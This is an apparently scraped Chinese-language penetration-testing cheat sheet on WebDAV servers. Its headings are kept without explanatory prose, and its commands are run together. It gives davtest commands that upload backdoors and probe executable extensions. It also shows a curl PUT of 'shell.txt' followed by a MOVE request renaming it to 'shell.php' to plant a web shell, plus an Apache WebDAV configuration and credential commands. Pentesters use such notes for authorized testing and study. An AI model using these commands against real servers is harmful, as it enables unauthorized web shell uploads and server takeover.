WebDav

DavTest
Cadaver
PUT 请求
MOVE 请求

IIS5/6 WebDav漏洞

提交凭据
参考资料

最后更新于




最后更新于
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extensioncadaver <IP>curl -T 'shell.txt' 'http://$ip'curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user/etc/apache2/users.passwordhtpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the passwordwget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q